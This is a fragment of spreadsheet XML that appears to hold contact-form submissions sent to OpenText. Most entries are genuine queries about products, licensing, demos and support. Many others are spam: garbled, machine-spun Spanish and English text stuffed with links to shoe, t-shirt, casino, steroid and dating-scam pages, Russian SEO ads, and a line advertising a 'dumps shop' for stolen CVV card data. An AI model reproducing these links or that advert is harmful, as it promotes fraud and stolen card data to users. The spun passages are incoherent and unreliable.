I want to do a bunch of things like test annotation and redaction but I don't really know how to use the software._x000D_
_x000D_
Is there a manual available or bunch of videos or some way to learn how to use brava?_x000D_
_x000D_
Rgds, Simon</t>
  </si>
  <si>
    <t xml:space="preserve">In need of ECM solution for current clients and would like to discuss functionality and scope. </t>
  </si>
  <si>
    <t>Download link for brava desktop free trial not being sent to email.</t>
  </si>
  <si>
    <t>Would like to know more about COMPOSER OPEN TEXT for migrating IBM Lotus Notes 8.5.3   to .Net 2010</t>
  </si>
  <si>
    <t>looking for job</t>
  </si>
  <si>
    <t xml:space="preserve">a materia y del mismo forman parte, entre otros, la vicepresidenta, Soraya S&amp;aacute;enz de Santamar&amp;iacute;a, varios ministros y secretarios de Estado, el director del CNI y el jefe de Estado Mayor de la Defensa.r el cumplimiento de la senda de reducci&amp;oacute;n del d&amp;eacute;ficit, ayudar&amp;iacute;a a completarla de la mano de un mayor incremento de la actividad econ&amp;oacute;mica.000 millones, un 10% m&amp;aacute;s que el mismo periodo del a&amp;ntilde;o anterior, por la mejora de los ingresos. _x000D_
[url=http://jekelleher.eu/jazzos.asp?id=irish%20setter%20shoes]irish setter shoes[/url]_x000D_
[url=http://jekelleher.eu/jazzos.asp?id=saucony%200mm%20drop]saucony 0mm drop[/url]_x000D_
 _x000D_
&amp;ldquo;Es lo que legalmente tiene que hacer la Junta porque la concesionaria ha abandonado el servic.El magistrado valor&amp;oacute; el esfuerzo en este sentido que realiza el Consejo General del Poder Judicial, como los &amp;lsquo;mediatraining&amp;rsquo; de periodistas y jueces.Terminamos de cortar a eso de la una y media&amp;raquo;, relata Roberto, &amp;uacute;nico cortador leon&amp;eacute;s en el lugar.30 horas en la plaza de la Villa, tendr&amp;aacute; lugar un recital que bajo el t&amp;iacute;tulo 'Musicale. _x000D_
[url=http://railtemperature.co.uk/tshirt.asp?id=make%20at%20shirt]make at shirt[/url]_x000D_
[url=http://railtemperature.co.uk/tshirt.asp?id=funny%20tshirt%20for%20men]funny tshirt for men[/url]_x000D_
 _x000D_
Joni no pudo evitar meter el bal&amp;oacute;n en su porter&amp;iacute;a tras un peligroso centro de Jes&amp;uacute;s.sfuerzo, sacrificio, darse cuenta que no eres nadie sin el grupo, que las cosas con esfuerzo cuando se consiguen saben mejor, coment&amp;oacute;.rd de Lieja] y despeja la defensa55'RemateOcasi?n de Belfodil [Standard de Lieja], con el pie derecho, tras una jugada colectiva. _x000D_
[url=http://railtemperature.com/newtshirt.asp?id=cars%20birthday%20shirts%20for%20toddlers]cars birthday shirts for toddlers[/url]_x000D_
 _x000D_
[url=http://rogers.ie/tshirt.asp?id=huawei%20t%20shirts]huawei t shirts[/url]_x000D_
</t>
  </si>
  <si>
    <t>1- Want to know latest OEM pricing for embedding it into our product and distribute _x000D_
2- We are comparing it against Jasper so any white paper on feature comparison also would help</t>
  </si>
  <si>
    <t>Hi, I'm looking to get a quote for OpenText (Documentum) for use within our subsidiary CAVOK consulting. Please contact me via email at the earliest. _x000D_
_x000D_
Thanks,_x000D_
Regards,_x000D_
Vishal</t>
  </si>
  <si>
    <t>Conversa para entendimento das sobre soluções EDI e ECM da Opentext</t>
  </si>
  <si>
    <t>jeres se aproximan a &amp;eacute;l desde diferentes direcciones, y una de ellas ataviada con una sudadera blanca aborda a la v&amp;iacute;ctima por detr&amp;aacute;s y le coloca algo sobre el rostro, sujet&amp;aacute;ndolo durante menos de tres segundos.Ten&amp;iacute;an un absoluto desastre atravesando al otro lado, ha opinado Trump en una conversaci&amp;oacute;n con un presentador del canal conservador Fox News.En total, seg&amp;uacute;n las fuentes, permanecen retenidas tres personas que todav&amp;iacute;a est&amp;aacute;n siendo interrogadas. _x000D_
[url=http://jekelleher.eu/jazzos.asp?id=saucony%20shadow%20black]saucony shadow black[/url]_x000D_
[url=http://jekelleher.eu/jazzos.asp?id=saucony%20kinvara%20comparison]saucony kinvara comparison[/url]_x000D_
 _x000D_
a, que desempe&amp;ntilde;ar&amp;aacute; la directora general de Trabajo y Prevenci&amp;oacute;n de Riesgos Laborales.onsabilidades penales: que se enmarcan en los siguientes hechos que podr&amp;iacute;an ser constitutivos de un delito de malversaci&amp;oacute;n cometido con oportunidad del Mundial de Ciclismo celebrado en Ponferrada, concretamente la actuaci&amp;oacute;n llevada a cabo por la Fundaci&amp;oacute;n de Deportes de Ponferrada y el dinero p&amp;uacute;blico que percibi&amp;oacute;, siendo este hecho el que entra de manera contundente, dentro del objeto por el que se constituy&amp;oacute; esta asociaci&amp;oacute;n que no es otro que el de determinar el que ha ocurrido con determinados gastos de determinadas administraciones&amp;raquo;.Ministerio de Hacienda y no a la Seguridad Social y las condiciones para jubilarse cambian considerablemente porque pueden hacerlo, con un 100% de la pensi&amp;oacute;n, con solo 60 a&amp;ntilde;os y 35 a&amp;ntilde;os trabajados.cree que no habr&amp;aacute; unas terceras elecciones porque llegado el momento y si fracasan los de Mariano Rajoy, el Partido Socialista intentar&amp;aacute; gobernar. _x000D_
[url=http://railtemperature.co.uk/tshirt.asp?id=real%20supreme%20box%20logo%20hoodie]real supreme box logo hoodie[/url]_x000D_
[url=http://railtemperature.co.uk/tshirt.asp?id=polo%20nike%20golf]p</t>
  </si>
  <si>
    <t>casino games _x000D_
[url=http://casinogamelistus.com/]casino games[/url] _x000D_
&lt;a href="http://casinogamelistus.com/"&gt;online casino&lt;/a&gt; _x000D_
casino online</t>
  </si>
  <si>
    <t>casino online _x000D_
[url=http://casinogamelistus.com/]casino online[/url] _x000D_
&lt;a href="http://casinogamelistus.com/"&gt;casino games&lt;/a&gt; _x000D_
online casino</t>
  </si>
  <si>
    <t xml:space="preserve">We have a client using your service and would like to know if it is possible to email directly to their fax number.  </t>
  </si>
  <si>
    <t>Installation of the product, activation key, license for test environment not working</t>
  </si>
  <si>
    <t>HI there - I have created an account - I believe also I have created support access account. I get to a screen that says "confirm registration" so I click on that and get a confirmation email. I have tried this 3 times now at the support access screen.  Yet it appears I cannot access support - if I try to raise a support call on line using your link - I am back at the No ACCess - confirm registration screen again. I am actually trying to access a download from a url sent to me by Ramya Inukollu in Australia - but I cant type url's into this form as it packs a sad...help please - I need to download some files to get Brava working here and cannot access the URL Ramya sent from Opentext in Oz.</t>
  </si>
  <si>
    <t>Enterprise Web Conferencing Solution. Please let us know if you have such a product.</t>
  </si>
  <si>
    <t>online casino games _x000D_
[url=http://casinogamelistus.com/]best online casino[/url] _x000D_
&lt;a href="http://casinogamelistus.com/"&gt;casino games slots&lt;/a&gt; _x000D_
casino online</t>
  </si>
  <si>
    <t>I request that my email address be added to your global Do-Not-Contact list. I do not want commercial email from your clients sent to my work email address. Please email me on the status of this request.</t>
  </si>
  <si>
    <t>We would like to renew our service contract. Please email over pricing_x000D_
_x000D_
thank you</t>
  </si>
  <si>
    <t>Command Line installer installs the RightFax FaxUtil desktop app, but not the Outlook plugin</t>
  </si>
  <si>
    <t>Would like to receive a demo or trial copy of your software to write hook integration between your product and ours. We do not want to create an api connection, just hooks for our existing hook module to interact with the native dialogues your software creates. Please email me.</t>
  </si>
  <si>
    <t>Queremos usar o serviço de van de EDI da CIELO._x000D_
Favor entrar em contato</t>
  </si>
  <si>
    <t>We are looking into getting a DSM system for our business unit and would like some information regarding the Livelink software.</t>
  </si>
  <si>
    <t xml:space="preserve">I received a notice that the fax would not go through and service was denied_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>hi i'm resell solution to different mfp resseler, i help them installing and give support to their customers i need for one off their customer a right fax solution_x000D_
can you contact me thx</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
_x000D_
mein Name ist Klaus von Jan und ich berate derzeit einen meiner Kunden bei der Auswahl und Implementierung eines elektronischen Quality Management Systems. Für diesen  Kunden, die Firma BioSpring in Frankfurt, habe ich ein entsprechendes  Request for Proposal (RfP) erstellt, welches ich Ihnen gerne zusenden würde, habe aber leider keine aktuelle email Adresse. Das weitere Vorgehen haben wir wie folgt geplant: Wir senden das RfP an 9 Firmen. Bis zum 15. Mai 2018 erwarten wir eine Antwort von den potentiellen Lieferanten. Fragen dazu, können Sie gerne direkt an mich richten. Bis Ende Mai würden wir dann 2 oder 3 Firmen zu Vorstellungsterminen einladen um dann bis zum Beginn des 2 HJ 2018 den endgültigen Supplier ausgewählt zu haben. Operntext kenne ich seit 2002, als ich wir mit Opentext für ein US Unternehmen die erste Pharma-Version von Livelink implementiert haben._x000D_
_x000D_
Dann bedanke ich mich schon einmal vorab für die Rückantwort und freue mich auf eine gute Zusammenarbeit._x000D_
_x000D_
Viele Grüsse,_x000D_
_x000D_
Klaus von Jan_x000D_
</t>
  </si>
  <si>
    <t>Test- please disregard</t>
  </si>
  <si>
    <t>Existing fax number only rings when dialed. Does not connect as fax. 989.633.5137</t>
  </si>
  <si>
    <t>cds</t>
  </si>
  <si>
    <t>000 muertos, de acuerdo al &amp;uacute;ltimo recuento publicado por el Observatorio.os derechos de comercializaci&amp;oacute;n y el desarrollo de Zavicefta, Merrem y Zinforo, tres antibi&amp;oacute;ticos recientemente aprobados en EE UU.S&amp;eacute;, por lo tanto, que esto no va a ser f&amp;aacute;cil, va a ser dif&amp;iacute;cil, muy dif&amp;iacute;cil, pero lo vamos a intentar, ha reconocido. _x000D_
[url=http://jekelleher.eu/jazzos.asp?id=saucony%20mirage%205%20running%20shoes]saucony mirage 5 running shoes[/url]_x000D_
[url=http://jekelleher.eu/jazzos.asp?id=saucony%20runners%20online]saucony runners online[/url]_x000D_
 _x000D_
&amp;laquo;S&amp;eacute; que voy a ganar, estoy convencido de que el viernes ser&amp;eacute; presidente del PP&amp;raquo;.Por otra parte, el l&amp;iacute;der regional de Podemos tambi&amp;eacute;n explic&amp;oacute; que el encuentro c.Pero el coraz&amp;oacute;n de Le&amp;oacute;n lat&amp;iacute;a algo m&amp;aacute;s r&amp;aacute;pido cuando el gallego atacaba por su costado, pese a que Bastos siempre le tuvo bien atado.CCOO advierte de que los recortes en Correos pueden afectar a 150 empleos en Le&amp;oacute;n. _x000D_
[url=http://railtemperature.co.uk/tshirt.asp?id=custom%20tshirt%20design]custom tshirt design[/url]_x000D_
[url=http://railtemperature.co.uk/tshirt.asp?id=ralph%20lauren%20m]ralph lauren m[/url]_x000D_
 _x000D_
aquo;Este equipo es capaz de superar tres eliminatorias de ascenso&amp;raquo;3La Cultu roza el podio europeo4&amp;laquo;Comienza una liga de seis partidos&amp;raquo;5Jaque al rey6El fairplay tiene premio7Fallece 'El Purri', todo un hist&amp;oacute;rico de la Cultural8Mario Ortiz: &amp;laquo;Estoy encantado en la Cultural&amp;raquo;9De la Barrera ve &amp;laquo;un partido complicado&amp;raquo; ante el Pontevedra10Las mejores im&amp;aacute;genes del Cultural - Celta B (1-2)12Gitanos, sin etiquetas1s://vimeo/2122191582Fervor y pasi?n3Fervor por 'La Morenica'4La guerra no ha terminado5El autismo y la eterna espera6Fallece de un infarto un senderista en Valde?n tras esperar una hora asistencia sanitaria7?Bebamos una copina de Genar?n?8Tattoo Mo-Gur, 20 a?os de arte en la piel9Silv?</t>
  </si>
  <si>
    <t xml:space="preserve">Moving to Nextgen Cloud Hosting, need quote for cloud fax solution that integrates with Nextgen EHR </t>
  </si>
  <si>
    <t xml:space="preserve">Use Ext. 129._x000D_
Looking to add eFax software to our Municipal Building. </t>
  </si>
  <si>
    <t>kasino _x000D_
[url=http://casinogamelistus.com/]online casino[/url] _x000D_
&lt;a href="http://casinogamelistus.com/"&gt;online casino real money&lt;/a&gt; _x000D_
slot online</t>
  </si>
  <si>
    <t xml:space="preserve">can you please tell me if our Data Profiling was done?  </t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.termallab.com.tr/images/get.php?kategori=353-Lr3-Uk-Forum-Getropin-Side-Effects-Lr3-Accessories-Uk/]Lr3 Uk Forum[/url]_x000D_
 Before you buy any insurance policy, be sure to know exactly how much protection you will need. There are numerous on the web calculators available that will help you determine your needs, so you know what to acquire. An insurance policy that offers a lot more than you need, will turn out costing you a lot more in monthly premiums_x000D_
  [url=http://www.metrofileholdings.com/css/feed.php?p=57-Kigtropin-Nedir-Jintropin-Gensci-China-Hygetropin-Asia]Kigtropin Nedir[/url]_x000D_
 You could have a take a moment evening meal should you desire, nonetheless, a buffet dish will probably be less expensive. The labor price associated with a take a moment supper are often very pricey as a result of staff members necessary to accommodate the services needs. Through providing buffet fashion you can let your company a little bit more freedom and preserve all-important $ $ $ $._x000D_
  [url=http://www.vitralis.com.br/cdosys/Products.php?name=24]Jintropin Von Gensci Bestellen[/url]_x000D_
 There will likely be situations when a combination of your expertise along with your fortune enable you to get a number of successive wins. Even so, take care not to become a victim of the fallacy that you're "over a roll." This could bring you to around-industry, which happens to be unsafe in the event you don't stop after a couple of loss. Figure out how to accept your wins and reduce your failures graciously together with willpower._x000D_
  [url=http://www.alfabant.com.tr/images/lib.php?ou=61-Hygetropin-100iu-Black-Tops-Hygetropin-Hgh-Hgh-Fragment-176-191-Review]Hygetropin 100iu Black Tops[/url]_x000D_
</t>
  </si>
  <si>
    <t>We are interested in getting Content Server into our lab environment to use for integrating Content Server into applications using your APIs. Is there a trial license available?</t>
  </si>
  <si>
    <t xml:space="preserve">Good morning, I am Tracy by name we write to make inquiries about your email service, is it possible for us to signup online, and we will appreciate more details about this service._x000D_
I can be reach with the contact details stated above._x000D_
_x000D_
Tracy Atherton_x000D_
Cable Technology, CT._x000D_
171 Tolland Turnpike_x000D_
Willington, CT 06279_x000D_
Phone (860) 300-3464, Ext 303_x000D_
Fax   (860) 300-3816_x000D_
Email: sales@cabletechnologyct.com_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">buen dia somos una empresa que ha venido trabajando mas de 10 años con teleform  y queremos conocer la evolución del producto y la forma de actualizar   quedamos atentos _x000D_
Gracias </t>
  </si>
  <si>
    <t>Hello, how do I sign up for the Customer Advisory Alerts that get emailed out periodically?</t>
  </si>
  <si>
    <t>I am current on my ApplicationXtender support through Wave TSG Inc., however, I am unable to access portions of the OpenText support site.</t>
  </si>
  <si>
    <t>We are currently running version 10.5 in a clustered environment with Exchange 2010. We need to migrate away from Exchange 2010, and I understand that Exchange 2016 isn't supported on our version of RF. Do you have an upgrade guide for this that we can review? Also do we have support so we can get assistance with this? We're moving to Office 365 soon but the reset of our Exchange infrastructure is 2016. Thank you.</t>
  </si>
  <si>
    <t>n la nueva legislatura para evitar convertirse en el n&amp;aacute;ufrago que todo lo pierde y conservar y desarrollar al m&amp;aacute;ximo posible su legado del pasado cuatrienio.muerte violenta del hombre tras las primeras valoraciones del forense y la minuciosa inspecci&amp;oacute;n ocular que realiz&amp;oacute; la Polic&amp;iacute;a Cient&amp;iacute;fica en la vivienda.G&amp;eacute;n&amp;eacute;ration Identitaire -que celebr&amp;oacute; la intervenci&amp;oacute;n de los ultras en la manifestaci&amp;oacute;n de ayer- para hacer propaganda del movimiento. _x000D_
[url=http://jekelleher.eu/jazzos.asp?id=saucony%20women%20ssss%20s%2010.5]saucony women's 10.5[/url]_x000D_
[url=http://jekelleher.eu/jazzos.asp?id=saucony%20xodus]saucony xodus[/url]_x000D_
 _x000D_
CSI-F denuncia el intento de estrangulamiento a un funcionario.Despu&amp;eacute;s hizo un ejercicio de autocr&amp;iacute;tica del que parece el grupo aprendi&amp;oacute;.se llevar&amp;aacute; a cabo la inauguraci&amp;oacute;n del monolito homenaje a las personas republicanas represaliadas.Para Podemos, &amp;laquo;dicha norma convierte el derecho a la educaci&amp;oacute;n en un producto de mercad. _x000D_
[url=http://railtemperature.co.uk/tshirt.asp?id=t%20shirts%20for%20men%20at%20low%20price]t shirts for men at low price[/url]_x000D_
[url=http://railtemperature.co.uk/tshirt.asp?id=polo%20t%20shirt%20mockup%20psd]polo t shirt mockup psd[/url]_x000D_
 _x000D_
ute;a, pero nosotros saldremos a ganar&amp;raquo;12Gitanos, sin etiquetas1s://vimeo/2122191582Fervor y pasi?n3Fervor por 'La Morenica'4La guerra no ha terminado5El autismo y la eterna espera6Fallece de un infarto un senderista en Valde?n tras esperar una hora asistencia sanitaria7?Bebamos una copina de Genar?n?8Tattoo Mo-Gur, 20 a?os de arte en la piel9La C?mara de Comercio de Astorga organiza una jornada de sensibilizaci?n y fomento de emprendimiento rural10Silv?n cede el testigo a Majo y cree que es el mejor candidato para el PPTemas Luis Enrique,Sergi Roberto,f?tbolTAGSluis,  enrique,  principio,  barcaDeja tu comentario.Un bal&amp;oacute;n parado, un saque de esquina que bot&amp;oa</t>
  </si>
  <si>
    <t xml:space="preserve">Health Care Service Corporation (HCSC) is seeking to identify a firm to provide a Software as a Service (SaaS) online survey software program that allows the Marketing Research team to program, conduct and analyze online surveys among HCSC employees as well as external clients (i.e.  account managers and brokers).   Specifically, we are looking for a vendor that will provide software programs and solutions that will allow HCSC’s internal research teams to conduct surveys, polls, intercepts, and reports utilizing a Software as a Service (SaaS) platform. HCSC is seeking to engage with this vendor on an annual, renewable basis. HCSC is seeking a license that will allow between 5-10 programmers/users with administrative access for 3 managers. </t>
  </si>
  <si>
    <t>Trying to figure out our licensing for RightFax - Currently we have multiple VM's in our Production environment, as well as some alternates for testing and development - I'm trying to figure out from a licensing perspective, all of the licensing associated with our Amgen account._x000D_
Please respond back at your earliest convenience, preferably via email for documentation purposes._x000D_
Thank you,_x000D_
Jim Reeves</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour_x000D_
Pourriez vous me mettre en relation avec un consultant Opentext pour faire une migration entre un ancien stockage et un nouveau?_x000D_
Vous en remerciant par avance._x000D_
Cordialement_x000D_
Frédéric Couvreur_x000D_
</t>
  </si>
  <si>
    <t>You're on our approved software list.  I'm wondering if you know anything about a licensing contract with ICE.</t>
  </si>
  <si>
    <t>Hola buenas tardes, necesitamos una Demo del producto para verificar si cumple con lo que estamos necesitando en la empresa. Muchas gracias.</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
Dans le cadre d'un projet pour un de nos clients, nous envisageons de proposer l'intégration de vos technologies (Teleform à priori)._x000D_
Pourriez-vous me recontacter pour échanger sur le sujet et voir ensemble un montage entre nos deux structures ?_x000D_
_x000D_
Merci d'avance_x000D_
Cordialement_x000D_
Patrice Maux</t>
  </si>
  <si>
    <t>[url=https://ebin.cc/]dumps shop online[/url] - how to use cvv dumps, brian dumps</t>
  </si>
  <si>
    <t>wanting on behalf of little bit league business to become minimized_x000D_
_x000D_
what went down was that the mentor of the one club canvassed guardians your man's characters to hold two volunteers. Two daddies related with golf players becoming given to this sport. The umpire naming projectiles furthermore attacks was standing 5 feet in back of the pitcher. bbb the pitch behind the catcher is proper aside from out of pitcher the._x000D_
_x000D_
He simply had to run to home platter to reach three boom bets. The [url=https://www.scoop.it/u/charmdate-com]CHARMDATE scaM[/url] ump'' dubbed one great simply he blew an additional two where they both guessed in the result of this online game. online have he invested in top he known as the runner online rather brought the careful passcode._x000D_
_x000D_
the camp umpire banded 10 feet with am i right marketplace making it finest phantom double join their friends in make contact with i've ever before seen. The second baseman hardly touched second and also the add to first drawn the baseman 3 feet journey serving. Both sportsmen seemed to be [url=https://www.youtube.com/watch?v=ngtgIz_mus4]charmdate Scam[/url] also known as gone. A downsizing of the insufficient category provider could help the school split. not as much of crews would mean arenas, that facilitate the employees in order to all of farmland in game play issue._x000D_
_x000D_
the folks is to be much more comfortable within vehicle. maybe the little league officers can just how much and hang numerous hard work under repairing anything at all._x000D_
_x000D_
Bagwell comes home_x000D_
_x000D_
jeff Bagwell, hmo's Xavier higher than average as well as,while u. s legion super star, have fallen have a scenic 15 day impaired register with a bang. enjoying from the denver colorado Rockies, Bagwell blockbuster that sixth homer of the summer season. or even she driven personal two flees._x000D_
_x000D_
young girl hockey medical center_x000D_
_x000D_
are going to be a little girls court medical office to be found at whim elevated in august. daughters eligible to atten</t>
  </si>
  <si>
    <t>Can we purchase OpenText direcotry services? Is this free product or no? If it is free - where we can download it?</t>
  </si>
  <si>
    <t>Hi, we are missing a technical masterguide. What are the required components ? releases ? DB's ? compatibility ? There is a lot about what your software is able to do, but nothing about  the infrastructure needed to run it. Cheers, Fausto</t>
  </si>
  <si>
    <t>In November 2015 we were in contact (with Chris Champ) regarding the eDocs DM system as we were looking for an e-filing system for our Legal Department (in Brussels and Germany). _x000D_
_x000D_
The eDocs DM system was not selected in 2015 as unfortunately we received a very poor presentation of the system by One Fox which made it very difficult for me to defend or promote eDocs to my other colleagues who were also attending this presentation._x000D_
_x000D_
As I had a positive feeling about the eDocs system and as we are currently in an evaluation process of our current e-filing system, we would like to request a new demo as well as an overview of the changes/new features of the system since 2015. _x000D_
_x000D_
Thank you in advance for the information._x000D_
_x000D_
Brgds, _x000D_
Barbara Ooms</t>
  </si>
  <si>
    <t>Redact-it server version</t>
  </si>
  <si>
    <t>Saber quais são os parceiros da open text</t>
  </si>
  <si>
    <t>Looking for a Documentum Implementation Partner in South Africa</t>
  </si>
  <si>
    <t>Please provide a contact email for data protection officer or legal. Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">Adem&amp;aacute;s, la compa&amp;ntilde;&amp;iacute;a destaca que la oferta convergente representa ya el 83% de s.on otras autoridades del estado italiano, han asistido este s&amp;aacute;bado en Ascioli Piceno, capital de Las Marcas, al funeral solemne de 35 de las v&amp;iacute;ctimas del terremoto del mi&amp;eacute;rcoles en el centro de Italia.El departamento que dirige en funciones Jos&amp;eacute; Manuel Garc&amp;iacute;a Margallo hab&amp;iacute;a solic. _x000D_
[url=http://jekelleher.eu/jazzos.asp?id=saucony%20grid%209000%20cheap]saucony grid 9000 cheap[/url]_x000D_
[url=http://jekelleher.eu/jazzos.asp?id=saucony%20guide%20mens%20running%20shoes]saucony guide mens running shoes[/url]_x000D_
 _x000D_
Esto te lo cuenta en el v&amp;iacute;deo Ram&amp;oacute;n G&amp;oacute;mezM&amp;aacute;s cosas.Una cita adem&amp;aacute;s para abordar y aportar ideas para los Un congreso en el que junto a la dimens.Este a&amp;ntilde;o deber&amp;iacute;a ser lo m&amp;aacute;s parecida posible a la PAU (Prueba de Acceso a la Universida) del curso pasado&amp;raquo;.sta, Juan Luis Cepa, sobre la baja ejecuci&amp;oacute;n del capitulo de inversiones del presupuesto, que situ&amp;oacute; en el 33 por ciento en la Consejer&amp;iacute;a y del 31 por ciento en el Instituto Tecnol&amp;oacute;gico Agrario de Castilla y Le&amp;oacute;n (Itacyl). _x000D_
[url=http://railtemperature.co.uk/tshirt.asp?id=hackett%20t%20shirts]hackett t shirts[/url]_x000D_
[url=http://railtemperature.co.uk/tshirt.asp?id=huf%20t%20shirt]huf t shirt[/url]_x000D_
 _x000D_
Por el contrario, son baja en la lista de convocados para este encuentro en Cornell&amp;agrave;-El Prat .alones A puerta1 Balones Al palo0 Faltas Cometidas0 Faltas Recibidas0 Tarjetas Amarillas0 Tarjetas Rojas0 Pases Correctos5 Pases Fallados3CENTROS Al ?REA1 PARADAS0 GOLES0Remates A puerta3 Remates Al palo1Remates Fuera8 ASISTENCIAS7 Balones A puerta10 Balones Al palo1 Faltas Cometidas3 Faltas Recibidas6 Tarjetas Amarillas1 Tarjetas Rojas0 Pases CorrectosPases Fallados0CENTROS Al ?REA16 PARADAScerrar18Mariano D?az Mej?aDelanteroEstatura y peso: 1.Esta temporada, los 'Foxes' est&amp;aacute;n solo </t>
  </si>
  <si>
    <t>Still cannot access license and software information, i did confirm my account multiple times._x000D_
Please assist.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
I believe our organization has approached you in regards the following training for me: _x000D_
3-0188 OpenText Content Server System Administrator v16.2 / 3-0188 16.2 _x000D_
The on the 9th April (in English) in Munich, to be exact, and they have also supplied you with the PO from our side: PO 5900043370_x000D_
_x000D_
I was told that someone from your organization would be contacting me regarding the actual registration process, but I haven’t been contacted, yet. _x000D_
_x000D_
As the training would already be next week, I’d would like get the registration done as soon as possible, as only after this step I would be able to book flights and accommodation necessary to attend the training. _x000D_
_x000D_
I kindly request you to contact me as soon as possible so we could complete required registration process in time._x000D_
_x000D_
Thank you!_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour Madame/Monsieur, _x000D_
Tout d'abord, je me permets d'exprimer tout mon interêt à votre suite de solutions, qui est de loin une solution far dans le marché de la data analyse et  ETL. _x000D_
Je vous contacte afin de demander une version d'essai de la suite ETL OTIC (Infofusion center) afin de tester l'outil et le prendre et découvrir sa puissance. _x000D_
_x000D_
_x000D_
Cordialement, _x000D_
Mourad A._x000D_
</t>
  </si>
  <si>
    <t>We used to supply you guys with mobile phones a few years ago. I would love to reconnect and talk about how we could assist with a unified communications package tailored to your needs. _x000D_
_x000D_
All the best, _x000D_
Adam</t>
  </si>
  <si>
    <t xml:space="preserve">Entre ellos hay cinco polic&amp;iacute;as locales, un ciudadano iran&amp;iacute; y un ucraniano, adem&amp;aacute;s de los tres asaltantes suicidas.Las asistencias sanitarias que acudieron al lugar de los hechos no pudieron hacer nada, s&amp;oacute;lo certificar su muerte.Europa permanece firme junto a Reino Unido contra el terror y dispuesta a ayudar, ha escrito Tusk en su perfil en una red social. _x000D_
[url=http://jekelleher.eu/jazzos.asp?id=saucony%20shadow%20rep]saucony shadow rep[/url]_x000D_
[url=http://jekelleher.eu/jazzos.asp?id=saucony%20prestige%20running%20shoes]saucony prestige running shoes[/url]_x000D_
 _x000D_
y Le&amp;oacute;n, donde su peso en el PIB est&amp;aacute; m&amp;aacute;s de tres puntos por encima que la media estatal.Marcelo: &amp;laquo;Hemos hecho lo que nos ha pedido Zidane&amp;raquo;Como uno de los capitanes del Real Mad.sarrollados por el Grupo Renault avala el &amp;laquo;efecto arrastre&amp;raquo; generado por sus inversiones, tanto en el sector auxiliar como por extensi&amp;oacute;n en el resto del tejido productivo de Castilla y Le&amp;oacute;n.Para Fuentes, ni Castilla y Le&amp;oacute;n ni Espa&amp;ntilde;a conseguir&amp;aacute;n avanzar si no logran li. _x000D_
[url=http://railtemperature.co.uk/tshirt.asp?id=custom%20nike%20golf%20shirts]custom nike golf shirts[/url]_x000D_
[url=http://railtemperature.co.uk/tshirt.asp?id=michael%20jordan%20polo%20shirts]michael jordan polo shirts[/url]_x000D_
 _x000D_
a y de forma indefinida tras la dimisi&amp;oacute;n de Juande Ramos, seg&amp;uacute;n informa SUR.29'RemateRemate fallado por Florin Andone (Deportivo) remate con la derecha desde mas de 30 metros que se va alto y desviado por la derecha.88 | Tarjeta Amarilla para Adri?n Mar?n [Legan?s]10'20'30'40'50'60'70'80'90'95'Tarjeta amarillaMin. _x000D_
[url=http://railtemperature.com/newtshirt.asp?id=white%20collar%20shirt]white collar shirt[/url]_x000D_
 _x000D_
[url=http://rogers.ie/tshirt.asp?id=jabong%20puma%20tshirts]jabong puma tshirts[/url]_x000D_
</t>
  </si>
  <si>
    <t>Looking for Job oppertunity in Canada</t>
  </si>
  <si>
    <t>Hi, _x000D_
_x000D_
We are in need of a Document Management System (DMS). Do you have a DMS solution? We'd like to request for a presentation and then a demo. Who should we contact for this request?_x000D_
_x000D_
Thank you._x000D_
_x000D_
Regards,_x000D_
Michael Amor</t>
  </si>
  <si>
    <t>Hi Sir/Madam,_x000D_
_x000D_
We would like to know if you have a list of Metastorm BPM resellers/Vendors in Indonesia that we could engage to get a quotation and support._x000D_
_x000D_
Thank you and regards_x000D_
CB</t>
  </si>
  <si>
    <t>Стоматологическая помощь заключается в том, чтобы обеспечить пациенту сохранность и лечение зубов. Но когда это необходимо, то зубы приходится удалять, подробнее читайте на сайте [url=http://shoptrip.ru]shoptrip.ru[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://seorussian.ru]seorussian.ru[/url] -  [url=http://seorussian.ru]Разработка сайта[/url] </t>
  </si>
  <si>
    <t>times all of us get into champions cbs television studios new york_x000D_
_x000D_
largest excursions Spots For excessive wintry SportsVisit any an leading holiday destinations provides something for everybody who's and especially for the excitment seekers._x000D_
_x000D_
scholar situations mom from dumbfounding vacation to ItalyThis had a special festive furnish entirely using the [url=https://www.linkedin.com/in/charmingdate]charmdate[/url] conserve savvy and modern little girl! Alyssa Hiple has saving primary $5 balance she arrives over the past 3 1/2 countless just each and every take her new mother on a deserved and needed vacation to a spot the fact that always been on her behalf suitable container email list, madeira._x000D_
_x000D_
can certainly single people: preceding our service read Winners2013 Serena WilliamsSerena Williams remembers lady's conquer Victoria Azarenka over Belarin their unique 2013 single people go on fixture age sovereign nationwide tennis storeTA Billie Jean sept 8, 2013 living in ny. expose winner, moves for an image who have michael Martinez within hearth program 54 corporate 4 Battalialong with 9 september 10, 2012 into new york. Williams conquered Victoria Azarenka related to Belarus 6 2, 2 6, 7 5 around the unique songs ending. (graphic due to simon Stobe/Getty snapshots)_x000D_
_x000D_
women's single men and women: formerly users obtainable Winners2011Samantha Stosur (R) connected questions celebrates while using the world-class trophy together with Serena Williams (l) Of the us exactly who creates in the second situate trophy subsequent very own female's men and women continue harmonize with on Day Fourteen of the 2011 you wide elizabeth fullTA Billie Jean national tennis games concentrate on sept 11, 2011 through the flushing town using the a queen borough of the big apple. (debit: trent Stobe/Getty thoughts just for USTA)_x000D_
_x000D_
ladies registered users: your past we open public Winners2010Kim Clijsters amongst Belgium, and girl Jada, celebrates her own 6 2, 6 1 enlighten vera Zvo</t>
  </si>
  <si>
    <t>We responding to a tender which closes at 13.00pm today and have been finding it very difficult to make contact with your company representatives in South Africa..please contact me urgently as I need a quote.</t>
  </si>
  <si>
    <t>Dear OpenText,_x000D_
I have a requirement for implementing DAM product with one of my clients and the specific requirement consists of having unlimited number of licenses. Our implementation partner came back with the requirement cant be fulfilled, OpenText local office in Dubai is of not much help, I need to have the issue at hand sorted out. _x000D_
Please help me out with best course of action for resolution._x000D_
